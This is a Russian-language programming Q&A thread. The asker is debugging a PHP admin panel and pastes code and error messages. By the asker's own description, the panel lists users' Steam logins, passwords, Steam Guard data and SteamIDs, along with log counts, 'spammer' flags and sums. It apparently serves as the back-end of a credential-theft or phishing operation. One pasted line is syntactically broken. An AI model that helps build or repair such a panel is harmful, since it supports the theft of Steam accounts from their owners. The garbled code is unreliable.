• Count(): Parameter must be an array or an object that implements Countable»?

    @jewelrygod Автор вопроса
    array('<p class="text-center">Нет аккаунтов в базе</p>', $Panel->int_GetVisits(), count If(isset($accounts) && !empty($accounts)){($accounts), $Panel->int_getTotalSum()),
    					$content
    				);
    			}

    сделал вот так
    по итогу вместо not found 404 на сайте панельки выбивает следующее -
    Warning: require_once(../php/classPanelPageGenerator.php): failed to open stream: No such file or directory in /home2/juxtacup/public_html/admin/index.php on line 3

    Fatal error: require_once(): Failed opening required '../php/classPanelPageGenerator.php' (include_path='.:/opt/alt/php56/usr/share/pear:/opt/alt/php56/usr/share/php') in /home2/juxtacup/public_html/admin/index.php on line 3
  • Count(): Parameter must be an array or an object that implements Countable»?

    @jewelrygod Автор вопроса
    scottparker, ну если спрашиваешь что в accounts, то там должно в панельке выбивать логин пасворд, парсить стим гуард и стимайди юзера
    $rows = "";
    $accounts = $Panel->arr_GetAccounts();
    for ($i = 0; $i < count($accounts); $i++) {
    if ($accounts[$i]["status"] == 0) $valid = "";
    else $valid = "";

    $rows .= str_replace
    (
    array("%login%", "%password%", "%guard%", "%steamid%", "%time%", "%spamer%", "%valid%", "%id%"),
    array(
  • Count(): Parameter must be an array or an object that implements Countable»?

    @jewelrygod Автор вопроса
    scottparker, $accounts[$i]["login"],
    $accounts[$i]["password"],
    $accounts[$i]["guard"],
    $accounts[$i]["steamid"],
    date("H:i", $accounts[$i]["time"]),
    $accounts[$i]["spammer"],
    $valid,
    $accounts[$i]["id"]
    ),
    $row_tpl
    );
    }

    $table = str_replace("%table_content%", $rows, $table_tpl);
    /*
    * /TABLE
    */

    $content = str_replace
    (
    array("%table%", "%visits%", "%total_logs%", "%total_sum%"),
    array($table, $Panel->int_GetVisits(), count($accounts), $Panel->int_getTotalSum()),
    $content
    );
    }
    else {
    $content = str_replace
    (
    array("%table%", "%visits%", "%total_logs%", "%total_sum%"),
    array('Нет аккаунтов в базе', $Panel->int_GetVisits(), count($accounts), $Panel->int_getTotalSum()),
    $content
    );
    }